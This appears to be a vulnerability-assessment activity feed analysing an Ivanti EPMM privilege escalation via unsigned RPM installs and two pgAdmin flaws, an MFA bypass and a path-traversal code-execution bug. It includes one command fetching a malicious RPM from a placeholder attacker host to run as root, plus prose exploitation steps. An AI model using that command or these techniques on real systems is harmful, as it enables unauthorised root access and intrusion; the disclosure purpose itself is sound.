Activity Feed

1
Ratings
Technical Analysis

To be published soon.

1
Ratings
  • Attacker Value
    High
  • Exploitability
    Medium
1
Ratings
Technical Analysis

CVE-2024-22026 is a local privilege escalation vulnerability in Ivanti EPMM (formerly MobileIron) server versions prior to 12.1.0.0, 12.0.0.0, and 11.12.0.1. This vulnerability allows a local attacker to gain root access to the system by exploiting the software update process with a malicious RPM package from a remote URL.

The appliance uses the following command to fetch and install RPM packages as a low privilege user. This of course means you must have CLI access:

install rpm url <remote url>

This above command is only a CLI wrapper for the following to occur which runs as root

/bin/rpm -Uvh *.rpm

This underlying rpm command does not enforce any signature verification or URL filtering, meaning any RPM package can be installed. This allows an attacker to forge and deliver a malicious RPM package that can compromise the appliance.

So you can root the appliance by hosting a malicious RPM with whatever commands you want, then fetch it using the standard update command on the Ivanti EPMM CLI, and your commands will run as root.

install rpm url http://<attacker_IP>/malicious.rpm

I have provided a POC here:
https://www.redlinecybersecurity.com/blog/exploiting-cve-2024-22026-rooting-ivanti-epmm-mobileiron-core

1
Technical Analysis

Rapid7 pen testers have noted they have encountered vulnerable versions of this software on engagements.

2
Ratings
Technical Analysis

pgAdmin is vulnerable to a multi-factor authentication bypass (CWE-287) whereby an attacker with knowledge of an account’s credentials can manage files and make SQL queries regardless of whether or not the account has been configured with MFA. This vulnerability has a CVSS v3 score of 6.4 with a vector of AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N.

Exploitation

An attacker with knowledge of a legitimate account’s username and password may authenticate to the application and perform sensitive actions within the application, such as managing files and executing SQL queries regardless of the account’s MFA enrollment status.

pgAdmin4 is a rewrite of the original application in Python and has evolved into pgAdmin4 version 8.5 (the latest version as of when this vulnerability was discovered). The application is written using the Flask web framework and uses common Flask patterns such as blueprints, which is a web application component that may include one or more resource handlers called “views”.

Upon normal authentication, an MFA-enabled user is granted a session without the mfa_authenticated key. pgAdmin then offers an mfa_required decorator that must be applied to individual Flask views in order to be protected. Once the username and password are validated, the session object itself is valid, meaning each view must opt into MFA authentication as opposed to being required to create a valid and authenticated session. The main view of the browser blueprint opts into MFA authentication. The /browser/ resource is the default location a newly authenticated user is redirected to. When this view is rendered by Flask, the MFA authentication status is checked and the user is prompted to enter their OTP.

If, however, the user has automated the necessary HTTP requests, there is nothing stopping them from using their authenticated session and accessing other parts of the application including the file manager and SQL editor blueprints. These two resources, along with others, only require an authenticated session, effectively ignoring the account’s MFA requirement.

Impact

An attacker is able to leverage an MFA-enabled account with only knowledge of its username and password to execute SQL queries and manage files. It should be noted that the file manager does not have full access to the root file system by default but is commonly used to store SQL related data files.

This vulnerability was fixed in pgAdmin 8.6 by commit f4761f5.

3
Ratings
  • Attacker Value
    High
  • Exploitability
    Medium
Technical Analysis

pgAdmin versions <=8.3 are vulnerable to a path traversal vulnerability in the session handling logic. This can be leveraged by an attacker to load a malicious serialized object and execute Python code within the context of the application. On Linux servers, this requires the ability to write files to the target. pgAdmin has a file management component that is available by default for users. With a known username and password, a user can authenticate to pgAdmin, upload a malicious object, and trigger code execution through the path traversal vulnerability. It should be noted that CVE-2024-4215 affects a superset of pgAdmin versions and, therefore, an attacker would be able to leverage an account regardless of it’s MFA enrollment status.

When targeting Windows servers, the vulnerability can lead to code execution by using a UNC path in place of the path traversal. Insecure outbound guest access was disabled by default in Windows 10 v1709 (Redstone 3). To leverage this technique, the target would either need to be an older system, or have guest access explicitly enabled. Alternatively, Windows servers can also be exploited by using the same file management functionality provided by pgAdmin.

This vulnerability was fixed in commit 4e49d75.